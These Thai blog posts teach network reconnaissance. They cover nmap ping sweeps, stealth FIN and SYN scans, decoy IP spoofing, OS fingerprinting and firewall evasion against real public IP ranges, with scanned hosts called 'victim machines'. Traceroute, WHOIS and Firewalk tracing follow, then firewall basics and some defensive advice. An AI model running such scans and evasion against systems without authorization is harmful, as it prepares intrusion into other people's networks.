คำสั่งนี้จะใช้ได้เมื่อคุณได้อยู่ในวง Network เดียวกับคุณ หรือ วงอื่น ซึ่งจะแสกนวงเดียวกับคุณ IP 172.16.66.0 – 172.16.66.255 หมายถึง คุณต้องมี IP ที่อยู่ระหว่าง 172.16.66.0 – 172.16.66.255 ถึงจะใช้คำสั่งนี้ได้ เช่นคุณมี IP = 172.16.66.216 สังเกตเลขชุดสุดท้ายที่อยู่หลังจุดให้ดีๆ อาจเป็นเลขอะไรก็ได้ จาก 1-255 ถึงจะใช้ 0/24 แทน หรือ

C:>nmap –sP 172.16.66.11-172.16.66.20

คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP ระหว่าง 172.16.66.11 - 172.16.66.20

C:>nmap –sP 172.16.66.* หรือ C:>nmap –sP 172.16.66.0/24

คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP 172.16.66.1 ถึง 172.16.66.255

โดยปรกติ ถ้าคุณใช้คำสั่ง ping ธรรมดา จะมีการส่ง ICMP ECHO (Type 8) ออกไปยังเครื่องปลายทางและรอคอย ICMP ECHO_REPLY (Type 0) ส่งกลับมา ถึงแม้ ping จะมีประโยชน์ในการทดสอบว่าเครื่องปลายทางนั้นเปิดอยู่หรือไม่ก็ตาม แต่มันจะเหมาะกับ Network ขนาดเล็กและขนาดกลางเท่านั้น ซึ่งถ้ามาใช้ในใน Network ขนาดใหญ่อย่าง Internet มักจะใช้ได้ไม่มีประสิทธิภาพ โดยใช้ –sP เป็นการ ping scan เพื่อเป็นการตรวจสอบว่ามีเครื่องใดกำลัง logon อยู่



nmap –sP 203.118.98.0/24


คำสั่งนี้จะใช้ได้เมื่อคุณได้อยู่ในวง Network เดียวกับคุณ หรือ วงอื่น ซึ่งจะแสกนวงเดียวกับคุณ IP 203.118.98.0 – 203.118.98.255 หมายถึง คุณต้องมี IP ที่อยู่ระหว่าง 203.118.98.0 – 203.118.98.255 ถึงจะใช้คำสั่งนี้ได้ เช่นคุณมี IP = 203.118.98. 10 สังเกตเลขชุดสุดท้ายที่อยู่หลังจุดให้ดีๆ อาจเป็นเลขอะไรก็ได้ จาก 1-255 หรือจะใช้ 0/24 แทน หรือ

nmap –sP 203.118.98.11-203.118.98.20

คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP ระหว่าง 203.118.98.11 - 203.118.98.20

nmap –sP 203.118.98.* หรือ C:>nmap –sP 203.118.98.0/24

คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP 203.118.98.1 ถึง 203.118.98.255

(เครื่องมือ nmap นี้ จะเป็นการหาแบบละเอียด เมื่อเทียบกับโปรแกรมอื่น แต่อาจใช้เวลานานกว่า)



เทคนิคการแสกนหลบ เมื่อเครื่องปลายทาง block ICMP

จะเป็นการ Ping Sweep ขั้นสูงที่เรียกว่า TCP Ping scan โดยการใช้พารามิเตอร์ –PT พร้อมกับระบุหมายเลข port ต่างๆเข้าไป ซึ่งการระบุเลข port นั้นจะต้องทราบว่าเครื่องส่วนใหญ่นั้นจะต้องเปิดเอาไว้เพื่อติดต่อสื่อสารกับเครื่องอื่นๆ เช่น http 80 , SMTP 25 , POP 110 , IMAP 143 และอื่นอีกมาก ซึ่งปรกติจะต้องเปิดไว้คือ http 80 ซึ่งอาจทะลุผ่าน firewall ได้ถ้ามีการกำหนด firewall ได้ไม่ดี

nmap –sP –PT 80 203.118.98.0/24

ตรงเลข 80 ที่ผมได้ทำสีไว้เป็นการแสกนผ่านทาง http 80 ซึ่งอาจเปลี่ยนเป็นเลข port อื่นๆได้ตามที่ได้กล่าวมาด้านบนซึ่ง port ต่างๆที่ได้ใส่ไปก็คือการหา service นั่นเอง SMTP 25 , POP 110 , IMAP 143

nmap –sP –PT 25 203.118.98.0/24 เป็นการหาว่าเครื่องในวงแลนคุณเครื่องไหนเปิด SMTP 25

nmap –sP –PT 110 203.118.98.0/24 เป็นการหาว่าเครื่องในวงแลนคุณเครื่องไหนเปิด POP 110

nmap –sP –PT 143 203.118.98.0/24 เป็นการหาว่าเครื่องในวงแลนคุณเครื่องไหนเปิด IMAP 143



เทคนิคการแสกนแบบ TCP FIN scan

เทคนิคนี้สามารถที่จะทะลุผ่านไฟล์วอลล์ ส่วนใหญ่ และมีการเก็บผลลัพธ์ไว้ในไฟล์ text

nmap –sF 203.118.98.0/24 –oN output.txt

จากบรรทัดบน –sF เป็นการแสกนแบบ Stealth FIN รายละเอียดให้ดูรูปประเภทการแสกนที่อยู่ช่วงแรกๆ และพารามิเตอร์ –o เป็นการบันทึกผลลงเป็นไฟล์ ส่วน N หลัง –o ตรง (-oN) หมายถึงให้บันทึกในรูปแบบที่อ่านเข้าใจได้โดยโปรแกรมจะสร้างไฟล์ output.txt หรือถ้าคุณต้องการบันทึกเพื่อจะนำไปใช้กับโปรแกรมอื่นๆ ให้ระบุเป็น พารามิเตอร์ –oM แทน

ผมเหนื่อยแระ ขี้เกียจทำเป็็นหัวข้อ

________________________________________

คุณอาจใช้ Option + Parameter อื่นๆ ผสมผสานกันได้ โดยประยุกต์จากตัวอย่างต่างๆที่ผมได้ทำเป็นตัวอย่างดังที่เห็นอยู่ ซึ่งจะทำให้การใช้งานเครื่องมือนี้ มีประสิทธิภาพมากขึ้น ในการแสกนหาเครื่องเหยื่อ ในโปรแกรม Nmap ได้อย่างลงตัวกับสถานะการณ์ (แต่ต้องหัดเอาเองบ้างนะ) ซึ่งผลจากการแสกนต่างๆนั้นรับรองได้้เลยว่าโปรแกรมอื่นคงทำไม่ได้อย่างโปรแกรมนี้ แต่มันก็ยากในการใช้งาน เพราะ Option ในตัวโปรแกรมช่างเยอะเหลือเกิน จะถอดใจตอนนี้ก็ยังไม่สายนะ ดูชื่อเว็บที่ผมตั้งสิ กรรมกรไซเบอร์ มันก็ต้องออกแรงกันหน่อย และสำหรับคนที่ยังไม่ถอดใจ ผมก็จะมีตัวอย่าง และ Tip เด็ดๆให้อีกเล็กๆน้อยๆ

Nmap มีความสามารถในการหลอก firewall เครื่องปลายทาง โดยการส่งแพ็คเก็ตปลอมจำนวนมากที่ไม่เกี่ยวข้องกับการแสกนเข้าไปในระบบ ด้วยการใช้พารามิเตอร์ –D และขณะเดียวกันก็ทำการแสกนจริงๆไปด้วย และด้วยการเพิ่มความยากในการตรวจจับ สามารถปลอม IP ADDRESS ของ server อื่นที่มีอยู่จริง แต่ถ้า IP ADDRESS ที่ปลอมนั้นไม่มีอยู่จริงๆ การแสกนของคุณจะเป็นการทำ SYN Flood ซึ่งไปเข้าเงื่อนไขการโจมตีระบบด้วย Denial of Service (การทำให้ Network ล่ม คือทำให้การรับส่งข้อมูลใน Network คับคั่งหรือที่เห็นง่ายๆก็คือ เน็ตจะช้า หรือเครื่องอาจหลุดจาก Internet ได้) วิธีดูจากข้างล่างนี้

nmap –sS 203.118.98.110 –D 203.114.234.5

-sS เป็นการแสกนแบบ TCP SYN scan 192.16.81.110 เป็น IP เครื่องเป้าหมายที่คุณจะแสกน และส่วนที่ตามหลัง Option –D คือ IP 203.114.234.5 เป็น IP Server ของอะไรก็ได้เช่น yahoo , sanook ซึ่งจะหา IP นี้ได้โดยการ เปิด ดอส ขึ้นมาแล้วพิมพ์ c:\ping www.yahoo.com เท่านี้คุณก็จะได้ IP Server จริงๆ ที่จะนำมาใช้ในคำสั่งนี้ แต่ถ้าคุณเอา ไอพีมามั่วๆ จะเป็น เข้าเงื่อนไขการโจมตีระบบด้วย Denial of Service

nmap –O 203.121.148.18

คำสั่งบนนี้ จะเป็นการหาข้อมูลจากเครื่องที่ มี IP 203.121.148.18 ว่ามีการเปิดที่ Port ไหนบ้าง และใช้ระบบปฏิบัติการอะไร แต่การแสกนอาจใช้เวลานาน ถ้าคนที่ใจร้อนอาจหันไปพึ่งโปรแกรมอื่น ผมก็ไม่ว่าอะไรครับ แต่ขอบอก โปรแกรมนี้ แสกนได้แม่นยำกว่าโปรแกรมอื่นอยู่มากทีเดียว

nmap –p80 –O 203.121.148.18

คำสั่งบนนี้ เป็นการใช้ option –p เข้ามาช่วยหา ในกรณีที่เครื่องเหยื่อได้เปิด port 80 เอาไว้



การประยุกต์ใช้งานอื่นๆ

nmap –sS –p 25,80,135-139,455 –n 203.118.98.110

จากคำสั่งบนนี้ เป็นการแสกนไปที่เครื่อง 203.118.98.110 ไปที่ port 25 , port 80 , port 135 , 136 ,137 , 138 ,139 , port 455 ว่าเปิดอยู่หรือไม่

nmap –sS –O 203.118.98.110

จะเห็นว่าคำสั่งนี้ คลอบคลุมกว่า 2 คำสั่งด้านบน ยิ่งถ้าคุณได้เพิ่ม Option –p แล้วใส่ port ที่ต้องการแสกนได้อีกด้วยครับ แต่บางที Option –sS อาจหลบ Firewall ไม่ได้

Option –T 4 เป็นอีก option ที่น่าสนใจเป็นอย่างมาก คุณลองใช้ option ลงไปร่วมกับ option อื่นได้ จะช่วยให้การแสกนนั้นรวดเร็วยิ่งขึ้นครับเช่น

nmap –sS –O –T 4 203.118.98.110

nmap –sP –PT80 –T 4 203.118.98.0/24

การแสกนตรวจประเภท Firewall

nmap –sW 203.118.98.110 และคำสั่ง nmap –sA 203.118.98.110

คำสั่งบนนี้ เป็นการตรวจสอบ Firewall ว่าเป็นประเภทไหน ในเครื่องที่มี IP 203.118.98.110 ทั้ง 2 Option นี้อาจเป็นตัวที่ใช้เจาะเครื่องที่มี firewall ป้องกัน เพื่อที่จะดูว่า จริงๆแล้วเปิด port อะไรบ้าง เพราะเราจะสามารถรู้ ระบบปฏิบัติการในเครื่องที่เราแสกนได้ จาก port ที่ได้เปิด

ในแต่ละเครื่อง ใน Internet คุณไม่สามารถไปดูที่หน้าจอได้ จึงยากต่อการรู้ว่า เครื่องนั้นๆ ใช้วินโดว์หรือ unix หรือ Linux เพราะฉนั้น คุณต้องดู port จากเครื่องเป้าหมาย แต่โปรแกรมแสกนธรรมดา จะไม่สามารถแสกน port ได้จากเครื่องที่ได้ติดตั้ง Firewall (แต่จริงๆ ก็เปิด port อยู่) จึงต้องใช้โปรแกรม nmap แสกน เพราะสามารถหลบ Firewall ได้

Window Port Default ข้างล่างนี้เป็น port มาตรฐาน ที่ Win มักจะเปิด และเราจะรู้ได้ หรือเดาได้ว่าใช้อะไร

Win 98/me 139

Win 2000/xp 139 – 445

Win 2000 Server 53 – 88 - 139 – 445

ส่วน UNIX / LINUX คุณจะเห็นความแตกต่าง port ที่เปิดเองครับ จะไม่เหมือน Window แน่นอนครับ
nmap –I ....IP....

อีก option ที่คุณน่าลองดู ว่าจะเกิดอะไรครับผม

การแฮกเกอร์

การแกะรอย
ในวินโดว์นั้น การแกะรอยต่างๆจากเครื่องอื่นๆในวงแลนหน่วยงานก็ตาม หรือจะเป็นใน Internet ก็ตามทีรวมไปถึง Website ต่างๆ คุณจำเป็นต้องอาศัยเครื่องมือต่างๆ(โปรแกรม) ซึ่งถ้าเก๋าหน่อยคุณสามารถที่จะเปิดดอสมาแล้วพิมพ์ก็ได้แล้ว แต่ถ้าไม่เก๋าจริงๆก็ควรหาโปรแกรมต่างๆมาใช้งาน ซึ่งโปรแกรมสมัยนี้การใช้งานและแสดงผลต่างๆ ดูง่ายต่อความเข้าใจ เรามาเริ่มทำความเข้าใจก่อนเกี่ยวกับพื้นฐานนะครับ


บทนำ

การที่ผู้บุกรุกจะกระทำการใดๆ กับเป้าหมายนั้น ส่วนใหญ่มักจะต้องมีกระบวนการในการสะสมข้อมูลเกี่ยวกับเป้าหมายนั้นๆ ก่อน จากนั้นจึงจะลงมือบุกรุกเข้าไปยังเป้าหมายที่ต้องการ และถ้าทำได้สำเร็จผู้บุกรุกอาจจะติดตั้งซอฟแวร์บางตัวเพื่อซ่อนร่องรอยหรือติดตั้ง backdoor ไว้ในระบบ เพื่อจะได้เข้ามาใช้งานได้ง่ายๆ ในครั้งต่อไป

ในขั้นตอนของการหาข้อมูลของเครื่องเป้าหมายนั้น ผู้บุกรุกจำเป็นต้องทราบว่าเครื่องเป้าหมายนั้น service อะไรอยู่บ้าง และถ้าได้ข้อมูลของ network topology และระบบปฏิบัติการด้วยแล้วก็จะเป็นข้อมูลที่มีประโยชน์มาก มีเครื่องมือหลายตัวและมีหลายวิธีในการตรวจสอบ network topology และ service ของเครื่องเป้าหมาย Firewalk ก็เป็นอีกเครื่องมือหนึ่งที่ David Goldsmith และ Michael Schiffman สร้างขึ้นมา โดยลักษณการทำงานจะคล้ายๆ กับ traceroute เพื่อใช้ตรวจสอบว่ามี service อะไรที่ไฟร์วอลล์เปิดให้ผ่านเข้าไปได้ และใช้ตรวจสอบ access control ได้ด้วย

***โดยส่วนใหญ่แล้วไฟร์วอลล์มักจะถูกคาดหวังจากผู้ใช้งานว่า จะเป็นตัวที่ทำหน้าที่ปกป้องเครือข่ายจากโลกภายนอก แต่ Firewalk ก็ได้แสดงให้เห็นแล้วว่าไม่ได้เป็นเช่นนั้นเสมอไป ผู้บุกรุกยังมีโอกาสในการหาข้อมูลเกี่ยวกับเป้าหมายมากกว่าที่เราคาดการณ์ไว้ และในการที่จะทำความรู้จักกับหลักการทำงานของ Firewalk จะต้องเข้าใจ traceroute เสียก่อน

Traceroute

คำสั่ง tracert (Windows) หรือ traceroute (*NIX) เป็นเครื่องมือช่วยในการตรวจสอบเครือข่าย โดยจะแสดง IP ของ router หรือ gateway ที่ packet วิ่งผ่านจากที่หนึ่งไปยังอีกเครือข่ายหนึ่งทีละ hop โดย traceroute ใช้คุณสมบัติของ IP Time To Live (TTL) ในการทำงาน

TTL ถูกนำไปใช้ในโปรโตคอล IP เพื่อป้องการการเกิดลูปที่ไม่รู้จบจากการวนของ pakcet โดยในแต่ละ device ที่ได้รับ packet จะลดค่าของ TTL ลงทีละ 1 และถ้า TTL มีค่าเป็นศูนย์หรือน้อยกว่า packet นั้นจะถูก drop ไป และ router ก็จะส่งข้อมูล ICMP "TTL Exceed in Transit" กลับมายังเครื่องที่รันคำสั่งนี้

Traceroute ใช้หลักการนี้ในการทำงาน โดยมันจะกำหนดค่า TTL counter ที่ทำให้ router ที่ packet ผ่านไปนั้นต้องสร้าง ICMP message กลับมาเสมอ สำหรับคำสั่ง tracert ใน Windows นั้น จะใช้ ping (ICMP Echo) เป็นตัวส่ง packet ออกไป ในขณะที่ traceroute ใน Unix นั้น จะใช้ UDP datagram เป็นตัวส่งข้อมูลออกไป datagram ที่ถูกส่งออกไปนั้นจะถูกส่งไปยัง port 33434 โดยดีฟอลต์ และ ค่าหมายเลข port นี้จะถูกเพิ่มขึ้นเมื่อได้รับ packet ที่ตอบกลับมาอย่างถูกต้อง โดยปกติแล้ว traceroute มักจะส่ง datagram ออกไปจำนวน 3 datagram เพื่อป้องกันการสูญหายระหว่างทาง

ด้านล่างนี้แสดงตัวอย่างการใช้ tracert.exe ใน Windows



เมื่อไฟร์วอลล์ถูกติดตั้งให้ไม่ตอบสนองต่อ traceroute และ ping จากโลกภายนอก เพื่อป้องกันไม่ให้ผู้บุกรุกเก็บข้อมูลของเครือข่ายภายในได้ ตัวอย่างด้านล่างนี้แสดงถึงผลลัพธ์ที่ได้จาก tracert.exe เมื่อถูกป้องกัน traffic ของ ping โดยไฟร์วอลล์หรือ router


จากตัวอย่างแสดงให้เห็นว่า ไม่สามารถ trace ได้อย่างสมบูรณ์ และจะได้รับ timeout message เมื่อคำสั่ง ping ถูก drop โดยปลายทาง และให้คุณสังเกตุแต่ละ hop (จากตัวอย่างได้ 11 hob) ถ้าคุณใช้คำสั่ง nslookup และตามด้วย IP ของแต่ละ hob คุณก็จะทราบว่า ก่อนที่เครื่องของคุณจะไปถึงเว็บ vanguard.com นั้นต้องผ่านที่ไหน ประเทศไหนบ้าง เราพิมพ์ไอพีแอดเดรสลงไป ในที่นี้เราพิมพ์ 203.94.12.01 (ซึ่งเป็นไอพีที่ผมต้องการหา)


$>nslookup 203.94.12.01

คุณจะเห็นผลลัพธ์ออกมาเป็น: mail2.nol.net.in ในตอนนี้ถ้าคุณดูที่ชื่อ hostname ที่เปลี่ยนมาจากไอพีแอดเดรสอย่างตั้งใจ จะเห็นได้ว่าส่วนหลังสุดจะบอกถึง ประเทศที่ระบบนั้นตั้งอยู่ จากตัวอย่างคุณเห็น '.in' ซึ่งบอกว่าระบบนี้อยู่ในประเทศอินเดีย ทุกประเทศมีรหัสประเทศของตัวเองซึ่งจะเห็นได้บ่อยมากกว่าชื่อท้ายสุดที่ไม่ใช่รหัสประเทศ วิธีนี้สามารถใช้เพื่อค้นหาว่าคน ๆ นั้น อยู่ในประเทศใหนถ้าคุณรู้อีเมลของเขา เช่น ถ้าคนนั้นมีที่อยู่อีเมลลงท้ายด้วย .ph แสดงว่าเขาอาจจะอาศัยอยู่ใน ประเทศฟิลิปปินส์ ประเทศอื่น ๆ ก็ทำนองเดียวกันนี้ รหัสประเทศ โดยทั่ว ๆ ไปเช่น:


ประเทศ รหัสประเทศ


ฟิลิปปินส์ .ph

ออสเตรเลีย .au

อินโดนีเซีย .id

อินเดีย .in

ญี่ปุ่น .jp

อิสราเอล .il

สหราชอาณาจักร .uk

รายการรหัสประเทศที่ครบสมบูรณ์ดูได้ที่: http://www.alldomains.com/ และ http://www.iana.org/domain-names.html

รายการรหัสรัฐต่าง ๆ ของสหรัฐ ฯ ดูที่: http://www.usps.gov/ncsc/lookups/abbr_state.txt

ผู้ที่ใช้วินโดวส์สามารถแปลงไอพีให้เป็น hostname ได้โดยการดาวน์โหลดยูทิลิตี้ที่ชื่อ Samspade จาก http://www.samspade.com/

อีกวิธีการหนึ่งที่ใช้หาที่อยู่ทางภูมิศาสตร์ของระบบคอมพิวเตอร์ที่ตรงจุดจริง ๆ คือการใช้ ฐานข้อมูล WHOIS เป็นฐานข้อมูลหลักที่ประกอบด้วยข้อมูลหลากหลายเช่นข้อมูลสำหรับการติดต่อ ชื่อ ผู้ที่เป็นเจ้าของโดเมนนั้น หาข้อมูลโดยการใส่ hostname ลงไป แล้วบริการนี้จะบอกข้อมูลที่อยู่ในฐานข้อมูลออกมา

วิธีนี้สามารถใช้เพื่อหาข้อมูลที่ถูกต้องเกี่ยวกับไอพี หรือ hostname ที่ต้องการ อย่างไรก็ตามมันอาจจะไม่มี ประโยชน์ถ้าคุณพยายามหาสถานที่ตั้งที่แท้จริงของผู้ใช้ไอพีแบบ dynamic IP แต่อย่างน้อยวิธีนี้สามารถใช้ เพื่อหาเมืองที่ไอเอสพีนั้นอยู่ได้


คุณสามารถใช้บริการ WHOIS ที่ http://www.alldomains.com/ นอกจากนี้คุณสามารถป้อนชื่อ hostname เข้าไปในบราวเซอร์ของคุณเพื่อใช้บริการ WHOIS โดยใช้ URL นี้: http://205.177.25.9/cgi-bin/whois?abc.com โดยเปลี่ยนชื่อ abc.com เป็นชื่อโดเมนที่คุณต้องการถามข้อมูลโดยใช้ WHOIS

วิธีนี้ไม่สามารถใช้เพื่อหาที่อยู่ที่สามารถติดต่อได้ ของบุคคลที่ต้องการค้นหา ถ้าไอพีที่คุณใช้เพื่อหาเขาเป็นของไอเอสพีของเขา ดังนั้นคุณจำเป็นต้องรู้ชื่อโดเมน (ซึ่งลงทะเบียนโดยใช้ชื่อของเขา) หรือไม่ก็รู้ได้เพียงแต่เมือง (และไอเอสพี) ที่ใช้โดยบุคคลนั้น

ถ้าบุคคลนั้นลงทะเบียนชื่อโดเมน และคุณต้องการใช้มันเพื่อค้นหาว่าเขาอยู่ในเมืองไหน สิ่งที่ควรสังเกตในกรณีนี้ คือถ้าบุคคลนั้นลงทะเบียนชื่อโดเมนที่ใช้บริการฟรี เช่น Namezero.com ดังนั้นชื่อโดเมนอาจจะลงทะเบียน โดยใช้ชื่อของบริษัทนั้นและไม่ใช่ชื่อของบุคคลที่เราต้องการค้นหา ฉะนั้นการใช้บริการ WHOIS จะให้ข้อมูล เกี่ยวกับไอเอสพีไม่ใช่บุคคลที่เราต้องการค้นหา

ข้อสังเกต: บริการ WHOIS โดยค่าเริ่มต้นจะรันอยู่ที่พอร์ต 43 ของระบบนั้น ลองใช้บริการโดยการ telnet ไปที่พอร์ต 43 และลองพิมพ์ค้นหา ผมไม่เคยลอง แต่มันต้องสนุกแน่ ๆ

Firewalking

ไฟร์วอลล์จะเป็นตัวหยุดยั้ง traceroute packet และจะไม่ยินยอมให้ traceroute packet ผ่านไปยังเครื่องเป้าหมาย วิธีการทำงานของ firewalking นั้น ใช้พื้นฐานที่ว่า ถ้าไฟร์วอลล์อนุญาตให้ traffic ชนิดใดผ่านไปได้ firewalking ก็จะส่ง packet ชนิดนั้นๆ ผ่านเข้าไป เช่น ถ้าไฟร์วอลล์อนุญาตให้ UDP port 53 (DNS queries) ผ่านเข้าไปยัง DNS server ที่ตั้งอยู่ภายในเครือข่ายนั้นๆ ผู้บุกรุกก็สามารถส่ง UDP port 53 พร้อมกับค่า TTL ของ hop ถัดไป เพื่อให้ผ่านไฟร์วอลล์เข้าไปได้ และได้ข้อมูลกลับออกมา และเนื่องจาก traceoute ถูกออกแบบให้ใช้งานฟิลด์ TTL ซึ่งทำงานบน IP protocol (network layer) ดังนั้นมันจึงสามารถใช้งานได้กับ upper layer protocol อื่นๆ ได้ เช่น UDP, TCP, ICMP ดังนั้นจึงทำให้สามารถตรวจสอบ service ที่เปิดให้บริการหลังไฟร์วอลล์ได้

สรุป

เราสามารถหยุดการใช้งาน Firewalking ได้โดยการบล็อค TTL Exceeded in Transit packet ขาออกที่ไฟร์วอลล์ หรือใช้ NAT (Network Address Translation) เพื่อซ่อน IP address ของโฮสต์ภายในเครือข่าย

สิ่งที่บทความนี้ต้องการจะเน้นย้ำก็คือ การใช้ระบบป้องกันเพียง layer เดียวนั้นไม่เพียงพอแล้วในปัจจุบัน และเราก็ไม่สามารถที่จะไว้วางใจไฟร์วอลล์ได้ว่าจะสามารถปกป้องเครือข่ายจากการหาข้อมูลของบรรดาผู้บุกรุกได้ ดูเหมือน host based detection จะเป็นตัวช่วยที่ดีอีกทางหนึ่งได้เช่นกัน นอกจากนี้ network intrusion detection system (NIDS) ก็ยังสามารถเป็นหูเป็นตาให้ผู้ดูแลระบบได้ด้วย

ดังนั้นการใช้ multiple layers สำหรับการทำ overlapping security นั้นเป็นสิ่งที่จำเป็นอย่างยิ่ง ผู้ที่มีหน้าที่เกี่ยวกับเรื่องนี้ในแต่ละองค์กรควรตระหนัก และหาทางนำเทคโนโลยีที่มีอยู่ในปัจจุบันไปประยุกต์ใช้เพื่อให้เกิดประโยชน์สูงสุด

________________________________________

แบบโปรแกรมที่แสดงผลเป็น Graphic

ให้คุณหาโปรแกรมกันเอาเองนะครับ โปรแกรม VisualRoute ซึ่งจะแสดงผลเป็นรูปภาพ ง่ายต่อการที่จะเข้าใจ แถมมีรูปแผนที่ให้คุณได้ดููอีกด้วยครับ


จากภาพตัวอย่างคุณสามารถเห็นเส้นทางการเดินทางของ packet ในแต่ละ hop ได้โดยง่าย คืออย่าคุณจะเข้าไปดูที่เว็บไหนสักแห่งหนึ่งนั้น เครื่องคุณต้องไปผ่านประเทศไหนบ้าง เมืองอะไร คือคุณไม่ต้องอาศัยเทคนิคหรือความเข้าใจในคำสั่ง tracert ,whois , nslookup มากเท่าไหร่ คุณก็ได้ข้อมูลที่สมบูรณ์มาแล้วด้วยโปรแกรมนี้

วันจันทร์ที่ 30 สิงหาคม พ.ศ. 2553

Firewall

Firewall เป็น เครื่องมือ รักษาความปลอดภัยให้กับเครือ ข่ายภายใน (Intranet) โดยป้องกันผู้บุกรุก


(Intrusion) ที่มาจากเครือ ข่ายภายนอก (Internet) ถ้าผู้บุกรุกมาจากจากเครอื ข่ายภายในระบบนี้จะป้องกันไม่ได้

สิ่งที่ป้องกัน เช่น ไวรัสคอมพิวเตอร์ (Virus), หนอนคอมพิวเตอร์ (Worm), การโจมตีแบบ DoS (Denial of

Service), ม้าโทรจัน (Trojan House), ip spoofing ฯลฯ โดยมีลักษณะการบุกรุก ดังนี้

– Virus จะแย่งใช้หรอื ทำาลายทรัพยากรของคอมพิวเตอร์ เช่น ไฟล์ข้อมูล, แรม ฯ

– Worm จะแย่งใช้ทรัพยากรของคอมพิวเตอร์ เช่น เขียนไฟล์ขยะลงบนฮาร์ดดีสก์ จนทำาให้

ฮาร์ดดีสก์เต็ม ฯ

– DoS จะส่ง Request หรอื เรียกใช้ Service ต่างๆ ไปที่เซิร์ฟเวอร์ จนทำาให้เซิร์ฟเวอร์ล่ม

– Trojan House จะแอบอยู่ในเคร่อื งไคลเอนด์หรอื เซิร์ฟเวอร์ เม่อื ถึงเวลามันจะทำาการเปิดพอร์ตของ

เคร่อื งนั้นให้กับผู้บุกรุก เช่น แฮกเกอร์สามารถรีโหมดเข้ามาควบคุมการทำางานของเคร่อื งนั้น

– ip spoofing การปลอมหมายเลขไอพีต้นฉบับเพ่อื ลักลอบเข้ามาในเครอื ข่าย

Firewall มีทั้งฮาร์ดแวร์และซอฟท์แวร์ ที่เปน็ ฮาร์ดแวร์ เช่น Router ที่ฟังก์ชั่น Screening Device,

Layer 3 Switch ฯ ที่เปน็ ซอฟท์แวร์ เช่น ipchains, iptables

ในการอบรมครั้งนี้จะใช้เคร่อื งคอมพิวเตอร์มีการ์ดเน็ตเวิร์ด 2 แผ่น ที่ติดตั้งลินุกซ์ทะเล 7.0 และใช้

โปรแกรม iptables การ์ดหนึ่งติดต่อกับเครอื ข่ายภายนอกใช้ Public IP ทำาหน้าที่เปน็ Firewall อีกการ์ดหนึ่งติด

ต่อกับเครอื ข่ายภายในใช้ Private IP

Firewall แบ่งออกได้ 3 ประเภท

1. Packet Filtering เปน็ Firewall ระดับพ้นื ฐานมีหน้าที่ตรวจสอบ IP Address และ Port ที่อยู่ต้นทาง

และปลายทาง รวมทั้งกรองแพ็กเกตข้อมูล สามารถแยกแยะประเภทของแพ็กเกตที่เปน็ TCP, UDP ได้

2. Circuit-Level Firewall เปน็ Firewall ประเภท Proxy Server ที่เปน็ ตัวคั่นกลางระหว่างเครอื ข่าย

ภายในกับเครอื ข่ายภายนอก การทำางานจะใช้เทคนิคที่เรียกว่า SPI (Stateful Packet Inspection) หลัก

การทำางานเปน็ แบบเดียวกันกับ Packet Filtering และได้เพิ่มการกำาหนดกฎในการเข้าถึง (Access

Rules) เพ่อื ใช้ในการควบคุมทราฟิก

3. Application Level Firewall เปน็ Firewall ประเภท Proxy Server ที่ทำางานระดับแอพพลิเคชั่น มี

หน้าที่ป้องกันเครอื ข่ายภายในกับเครอื ข่ายภายนอกไม่ให้ติดต่อกันโดยตรง การส่งการร้องขอ

(Request) และการตอบกับ (Response) ต้องผ่าน Proxy Server
Proxy Server จะทำาหน้าที่คั่นกลางระหว่างเครอื ข่ายภายในกับเครอื ข่ายภายนอก โดยมีหลัการทำางานดัง


นี้ เคร่อื งไคลเอ็นด์ต้องการติดต่อกับอินเตอร์เน็ต ก็จะส่งการร้องขอไปที่ Proxy Server จากนั้นตัว Proxy Server

จะแปลง IP Address ของเคร่อื งไคลเอนด์เปน็ IP Address ของ Proxy Server แล้วส่งการรร้องขอนี้ออกไปสู่

อินเตอร์เน็ต และเม่อื มีการตอบกลับจากอินเตอร์เน็ต จะกลับมาที่ Proxy Server จะมีการตรวจสอบว่าข้อมูลที่

ตอบกลับมีสิ่งผิดปกติหร่อื ไม่ ถ้าไม่มีก็จะส่งข้อมูลตอบกลับไปยังเคร่อื งไคลเอนด์ที่ร้องขอมา

รูปแบบการติดตั้ง Firewall

การติดตั้ง Firewall จะต้องติดตั้งให้เหมาะสมถึงจะเปน็ ประโยชน์ เพราะฉะนั้นจำานวนจุดที่ติดตั้งจะขึ้นอยู่

กับการออกแบบเน็ตเวิร์ค (Network Design) ถ้าการออกแบบเน็ตเวิร์คไม่มี DMZ (Demilitarize Zone) ให้

ติดตั้ง Firewall 1 จุด เคร่อื ง Proxy Server จะมีการ์ดเน็ตเวิร์ด 2 แผ่น แต่ถ้าการออกแบบเน็ตเวิร์คมี DMZ ให้

ติดตั้ง Firewall 2 จุด เคร่อื ง Proxy Server จะมีการ์ดเน็ตเวิร์ด 3 แผ่น

โปรแกรมท่หี น้าท่เีป็น Firewall ท่มี าพร้อมกับลินุกซ์ทะเล 7.0 คอื

1. lokkit เหมาะสำาหรับมอื ใหม่

2. iptables เหมาะสำาหรับมอื อาชีพ
เลือกเปิดใช้ไฟร์วอลล์ แสดงว่าลินุกซ์ละเลจะปฏิเสธการใช้บริการทั้งหมดจากเคร่อื งไคลเอนด์ การเปิดการ


ให้บริการ(การอนุญาต) ให้เลอื กรายการที่ต้องการให้มีเคร่อื งหมาย x หน้ารายการที่ต้องการ

ถ้าต้องการให้เคร่อื งไคลเอนด์สามารถใช้บริการโปรแกรมอ่นื ๆ เช่น MySQL และ PostgreSQL ให้เปิด

หน้าจอ Security Level Configuration (เมนู > ปรับแต่งระบบ > Security Level)

วันจันทร์ที่ 14 มิถุนายน พ.ศ. 2553

เทคนิค การออกแบบ Web Site ที่ดี

      ที่มา: www.NetDesign.ac.th

     ก่อนอื่นต้องขอทำความเข้าใจให้ตรงกันก่อนว่า การออกแบบ Web Site นั้นไม่ได้หมายถึงลักษณะน่า

